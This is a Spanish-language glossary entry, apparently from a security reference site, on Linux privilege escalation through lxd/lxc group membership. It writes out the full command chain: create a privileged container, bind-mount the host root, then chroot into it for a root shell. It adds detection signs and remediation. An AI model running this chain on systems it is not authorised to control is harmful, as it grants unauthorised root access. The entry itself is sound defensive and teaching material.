lxd / lxc group membership
Usuario en grupo lxd o lxc puede crear/iniciar containers privilegiados sin sudo.
Categoría: Linux · Privilege Escalation 🎯 Trinchera — Usuario en grupolxd o lxc puede crear/iniciar
containers privilegiados sin sudo. Container con bind mount de /
del host = root.
🔗 Kill chain — lxc init alpine evil -c security.privileged=true
→ lxc config device add evil host disk source=/ path=/mnt/host →
lxc start evil; lxc exec evil -- chroot /mnt/host /bin/bash.
📡 Huella defensiva — Creación de containers privilegiados,
binds de / del host.
⚠️ Falso amigo — Mismo patrón que docker socket. Cualquier
grupo “container manager” sin restricción = root path.
🛡️ Remediación — Auditar membresía de lxd/lxc/docker/podman
groups; usar tools rootless (Podman default).
← Volver al glosario completo Última actualización: 2026-06-11